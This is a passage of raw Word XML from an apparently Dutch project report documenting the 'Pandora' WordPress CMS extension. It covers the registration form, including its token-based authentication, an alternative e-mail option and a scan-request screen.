                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1391920" cy="34163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0941F"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6" o:spid="_x0000_s1026" type="#_x0000_t69" style="position:absolute;margin-left:108.5pt;margin-top:113.7pt;width:109.6pt;height:26.9pt;z-index:2516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" adj="2651" fillcolor="#c00000" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004B0257">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671527" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33F75561" wp14:editId="72B5D9AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-32385</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>977900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5785485" cy="2742565"/>
                <wp:effectExtent l="0" t="0" r="31115" b="26035"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21605"/>
                    <wp:lineTo x="21621" y="21605"/>
                    <wp:lineTo x="21621"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85485" cy="27425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2CF0" id="Rectangle 537" o:spid="_x0000_s1026" style="position:absolute;margin-left:-2.55pt;margin-top:77pt;width:455.55pt;height:215.95pt;z-index:2516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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>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E2204E" w:rsidRDefault="00E2204E"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95"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="68FCCB77" w14:textId="017F3134" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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9">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E2204E" w:rsidRDefault="00E2204E">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96"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="247423EE" w14:textId="1F12546B" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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E2204E" w:rsidRDefault="00E2204E"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97"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="50424763" w14:textId="2EF2CB82" w:rsidR="00E2204E" w:rsidRDefault="00E2204E"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42BE6640" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t xml:space="preserve">   Apach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98"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17D2A0C1" w14:textId="42BE6640" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t xml:space="preserve">   Apache2</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E2204E" w:rsidRPr="009B33B4" w:rsidRDefault="00E2204E">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="009B33B4">
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:sz w:val="32"/>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99"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y4HXsCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5074EB07" w14:textId="6D90C850" w:rsidR="00E2204E" w:rsidRPr="009B33B4" w:rsidRDefault="00E2204E">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="009B33B4">
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Artisan</w:t>
                      </w:r>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82F4A86">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C638A"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" filled="f" strokecolor="#ed7d31 [3205]"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B2355"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5A598EE8">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A33E7"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3620A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF4610">
        <w:t>Tabel 5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FE2684" w14:textId="1630DE10" w:rsidR="0029435A" w:rsidRDefault="00FF4610" w:rsidP="00FF4610">
      <w:r>
        <w:t>Figuur 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75185B7C" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427A9377" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737819F7" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E12FDA5" w14:textId="77777777" w:rsidR="00347FC5" w:rsidRPr="00347FC5" w:rsidRDefault="00347FC5" w:rsidP="00347FC5"/>
    <w:p w14:paraId="6188FB7C" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69871A2E" w14:textId="77777777" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F045722" w14:textId="77777777" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D106832" w14:textId="7F4D836C" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252923904" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D6E5ED1" wp14:editId="32C79BBE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-829875</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15C89" id="Rectangle 533" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-65.3pt;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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="697A2240" w14:textId="77777777" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A625634" w14:textId="6915AAFC" w:rsidR="00BC1BEA" w:rsidRPr="00994238" w:rsidRDefault="00AF58F9" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Pandora CMS Extensie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3B86B" w14:textId="77777777" w:rsidR="00FB14D3" w:rsidRDefault="00FB14D3" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="1177E489" w14:textId="4AA32F02" w:rsidR="00913071" w:rsidRDefault="00FB14D3" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB14D3">
        <w:t>Registratie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D25B5D1" w14:textId="4C7CCEEC" w:rsidR="00A7462B" w:rsidRPr="00A7462B" w:rsidRDefault="00A7462B" w:rsidP="00A7462B"/>
    <w:p w14:paraId="0D171D47" w14:textId="5D400EF4" w:rsidR="00456F5A" w:rsidRPr="009B360B" w:rsidRDefault="00186093" w:rsidP="00C86C1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252924928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C0370C6" wp14:editId="2D1299F6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3216275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2972435" cy="3041015"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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85">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2972435" cy="3041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928000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A82A25A" wp14:editId="0DA65895">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2662555" cy="3794125"/>
                <wp:effectExtent l="0" t="0" r="29845" b="15875"/>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7941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E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Dit is het registratiescherm van Pandora. Wanneer een gebruiker de extensie voor het eerst gebruikt krijgt hij dit scherm voor zich. Wanneer alle velden zijn ingevuld dient de gebruiker op de knop “registreer” te drukken.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="600A8DF3" w14:textId="0FF4983E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00C00F2D">
                            <w:r>
                              <w:t>Het formulier bestaat uit de velden:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35814AC1" w14:textId="0BB99F4C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Naam</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AB5CE56" w14:textId="689FF58A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Bedrijf</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6B20E938" w14:textId="7A8BF6FC" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>E-mail</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B9B940F" w14:textId="1C92CE8D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Token</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="668F2532" w14:textId="1FEF5342" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E469F7">
                            <w:r>
                              <w:t>De eerste 3 velden zijn begrijpelijk maar het veld Token heeft wat uitleg nodig.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="01F13F9B" w14:textId="7089D236" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E469F7">
                            <w:r>
                              <w:t>Token is een gecodeerde privé sleutel die aan de kant van Wordpress en Securityreport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200" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:0;width:209.65pt;height:29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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C64D62C" w14:textId="3FB65965" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Dit is het registratiescherm van Pandora. Wanneer een gebruiker de extensie voor het eerst gebruikt krijgt hij dit scherm voor zich. Wanneer alle velden zijn ingevuld dient de gebruiker op de knop “registreer” te drukken.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="600A8DF3" w14:textId="0FF4983E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00C00F2D">
                      <w:r>
                        <w:t>Het formulier bestaat uit de velden:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="35814AC1" w14:textId="0BB99F4C" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Naam</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5AB5CE56" w14:textId="689FF58A" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Bedrijf</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6B20E938" w14:textId="7A8BF6FC" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>E-mail</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5B9B940F" w14:textId="1C92CE8D" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="0015310C">
                      <w:pPr>
                        <w:pStyle w:val="ListParagraph"/>
                        <w:numPr>
                          <w:ilvl w:val="0"/>
                          <w:numId w:val="21"/>
                        </w:numPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Token</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="668F2532" w14:textId="1FEF5342" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E469F7">
                      <w:r>
                        <w:t>De eerste 3 velden zijn begrijpelijk maar het veld Token heeft wat uitleg nodig.</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="01F13F9B" w14:textId="7089D236" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00E469F7">
                      <w:r>
                        <w:t>Token is een gecodeerde privé sleutel die aan de kant van Wordpress en Securityreport wordt aangemaakt. De privé sleutel dient als authenticatie sleutel zodat het systeem de gebruiker herkent.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF3B036" w14:textId="514B5A0E" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="0EBBCDAE" w14:textId="17A312B7" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="3DE74002" w14:textId="753EACA4" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="6B8F68D0" w14:textId="17B7ACEB" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="77B4D677" w14:textId="1F8FB1C8" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="6F948A70" w14:textId="35A73A64" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="308FEA97" w14:textId="066ABB11" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="1C277F18" w14:textId="23C64176" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="275CB87D" w14:textId="0704D1A1" w:rsidR="00695ACA" w:rsidRDefault="00695ACA" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="7FD60715" w14:textId="6BC3D3F7" w:rsidR="00695ACA" w:rsidRDefault="00FF4610" w:rsidP="00C86C1E">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">   Figuur 5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AB80D1" w14:textId="45034D5B" w:rsidR="00695ACA" w:rsidRDefault="00695ACA" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="65797AAF" w14:textId="30056D06" w:rsidR="00695ACA" w:rsidRDefault="00695ACA" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="32438633" w14:textId="5B343F51" w:rsidR="00C00F2D" w:rsidRDefault="00FF4610" w:rsidP="00C86C1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252934144" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E6663E0" wp14:editId="56EDA8E9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3155950</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>106045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2945130" cy="3342640"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1016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5130" cy="3342640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00137542">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252935168" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BDC62FF" wp14:editId="4C85BF7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>113665</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2662555" cy="561340"/>
                <wp:effectExtent l="0" t="0" r="29845" b="22860"/>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561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E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Er kan een alternatieve E-mail mee worden verzonden i.p.v. de standaard Wordpres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201" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:8.95pt;width:209.65pt;height:44.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="577E0583" w14:textId="3A1755E7" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Er kan een alternatieve E-mail mee worden verzonden i.p.v. de standaard Wordpress E-mail.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="63801B22" w14:textId="402EE955" w:rsidR="00C00F2D" w:rsidRDefault="00C00F2D" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="01CC7657" w14:textId="2F96E9B2" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="43E1CBDE" w14:textId="64AA5ED1" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="5FADD11B" w14:textId="2DECE0B2" w:rsidR="00AF19C5" w:rsidRDefault="00AF19C5" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="484DACA4" w14:textId="26DB24C7" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="69704DC2" w14:textId="5363ADC2" w:rsidR="00AF58F9" w:rsidRDefault="00AF58F9" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="3533905B" w14:textId="2C779C9E" w:rsidR="00456F5A" w:rsidRDefault="00456F5A" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="53314FBC" w14:textId="73D82C7D" w:rsidR="00186789" w:rsidRDefault="00186789" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="00E11412" w14:textId="6FF2FEF1" w:rsidR="00B96F8B" w:rsidRDefault="00B96F8B"/>
    <w:p w14:paraId="30CDB486" w14:textId="6F901064" w:rsidR="00730594" w:rsidRDefault="00FF4610">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52986398" w14:textId="1A124468" w:rsidR="00730594" w:rsidRDefault="00FF4610">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253213696" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49D718FB" wp14:editId="4B96CD52">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3155950</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>170180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1016000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="802" name="Text Box 802"/>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E2B3E" w14:textId="1EDF1CD8" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                            <w:r>
                              <w:t>Figuur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718FB" id="Text Box 802" o:spid="_x0000_s1202" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:248.5pt;margin-top:13.4pt;width:80pt;height:18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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="289E2B3E" w14:textId="1EDF1CD8" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">
                      <w:r>
                        <w:t>Figuur 5.3</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00730594">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE93ED" w14:textId="2BE17743" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00726BA6">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252966912" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0223A870" wp14:editId="081CC15E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-912495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-712174</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C6704" id="Rectangle 221" o:spid="_x0000_s1026" style="position:absolute;margin-left:-71.85pt;margin-top:-56.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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DC502" w14:textId="77777777" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF123C1" w14:textId="261FC551" w:rsidR="00E30D45" w:rsidRPr="00726BA6" w:rsidRDefault="007E550D" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252969984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65BFFA14" wp14:editId="03A92015">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3059556</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10759</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3333512" cy="376368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87">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3333512" cy="3763682"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0023233C">
        <w:t>Scan aanvraag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E03E83B" w14:textId="6720BE96" w:rsidR="00726BA6" w:rsidRPr="001250BF" w:rsidRDefault="00243FA5">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20281519">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-154940</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>248920</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E2204E" w:rsidRDefault="00E2204E">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203" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-12.2pt;margin-top:19.6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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="63567964" w14:textId="2676D35E" w:rsidR="00E2204E" w:rsidRDefault="00E2204E">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p>
    <w:p w14:paraId="34215745" w14:textId="7AE33430" w:rsidR="001250BF" w:rsidRDefault="001637FE">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72BD7209">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-150495</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2112010</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2730500" cy="462280"/>
